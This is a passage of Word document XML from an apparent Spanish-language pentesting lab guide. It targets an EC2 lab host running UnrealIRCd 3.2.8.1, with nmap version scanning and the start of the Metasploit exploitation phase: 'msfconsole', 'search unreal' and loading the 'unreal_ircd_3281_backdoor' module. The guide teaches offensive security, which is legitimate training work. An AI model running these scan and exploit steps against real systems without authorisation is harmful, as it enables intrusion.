        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puerto 22 (SSH):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D50C1E3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Servicio de administración remota (Secure Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B123B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Generalmente difícil de explotar sin credenciales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65674982" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>No es nuestro objetivo principal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BE588" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puerto 6200 (IRC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A215C10" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Protocolo de Internet Relay Chat (salas de chat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD59A7F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">Servicio: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994B4F4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">Versión: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.8.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> ← ¡Este es nuestro objetivo!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EEE508" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anota esta información crítica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD54F6D" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:lastRenderedPageBreak/>
        <w:t>Servicio: UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1554FB8A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Versión: 3.2.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7842A908" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Puerto: 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B982F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47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t>Paso 3 (Opcional): Escaneo más detallado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EA1BB7" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Si quieres más información sobre el servicio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643610BF" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>nmap -sV -p 6200 -A &lt;REEMPLAZAR_CON_IP_PUBLICA_EC2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D645A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F98ED" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>-p 6200: Escanea solo el puerto 6200 (más rápido)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4A99D6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">-A: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aggressive scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> - Activa detección de OS, versión, scripts y traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC6323" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="004812B6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="2D6ED3F7">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73F8A0" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FASE 4: EXPLOTACIÓN (GAINING ACCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E15F3D4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3806D3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">Ahora que identificamos el servicio vulnerable (UnrealIRCd 3.2.8.1), vamos a explotarlo para obtener acceso a la máquina. Usaremos </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>, la herramienta de explotación más popular y poderosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6A9B67" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es Metasploit Framework?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D89496" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Es una plataforma que contiene miles de exploits (código que aprovecha vulnerabilidades) listos para usar. Piensa en ello como una "navaja suiza" del pentesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC913FD" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 1: Iniciar Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F108E0C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Abre tu terminal y ejecuta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39266AF4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E1F194" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Inicia la consola interactiva de Metasploit Framework. Es como abrir un programa especializado para hacking ético.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FD7390" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏱️</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tiempo de carga:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> 30-60 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D472903" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Verás el banner de Metasploit con arte ASCII y luego un prompt como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD3FCB" w14:textId="16E6C011" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00984733" w:rsidP="00984733">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00ED2427" w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>sf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED2427" w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37851135" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 2: Buscar el exploit para UnrealIRCd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F1FC84" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Dentro de msfconsole, ejecuta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C711AC4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="0012524F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>search unreal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1C7744" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61185008" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:lastRenderedPageBreak/>
        <w:t>search: Comando de Metasploit que busca en su base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC3250F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>unreal: Palabra clave relacionada con nuestro objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571AEB4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué hace este comando?</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Busca en la base de datos de Metasploit todos los exploits, módulos y payloads relacionados con "unreal".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55480BC7" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A74FBC" w14:textId="3A763AE2" w:rsidR="0012524F" w:rsidRPr="00A86A33" w:rsidRDefault="0012524F" w:rsidP="0012524F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64BDC30C" wp14:editId="33790ED8">
            <wp:extent cx="5523806" cy="2171725"/>
            <wp:effectExtent l="76200" t="76200" r="134620" b="133350"/>
            <wp:docPr id="1310501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1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578" cy="2176747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71BA2" w14:textId="693B60C5" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="0012524F">
      <w:pPr>
        <w:ind w:left="284" w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Análisis del resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBDFA7" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>: El nombre completo del módulo exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC006A6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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t>Disclosure Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>: Cuándo se descubrió la vulnerabilidad (12 junio 2010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CBE73F" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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t>Rank: excellent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>: Nivel de confiabilidad (excellent es el más alto)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7326AA" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41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t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">: UnrealIRCd 3.2.8.1 tiene un </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> (puerta trasera maliciosa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F2C3C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es un backdoor?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7670E9F6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Un backdoor es código malicioso insertado intencionalmente en el software que permite acceso no autorizado. En este caso, alguien modificó UnrealIRCd para incluir un comando secreto que ejecuta código.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC7F6C" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2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t>Paso 3: Seleccionar el exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14413238" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00984733">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24305BF9" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Explicación del comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4519D3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1004"/>
        </w:tabs>
        <w:ind w:left="1004"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>use: Comando que carga un módulo específico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFCA099" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="001275E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:tabs>
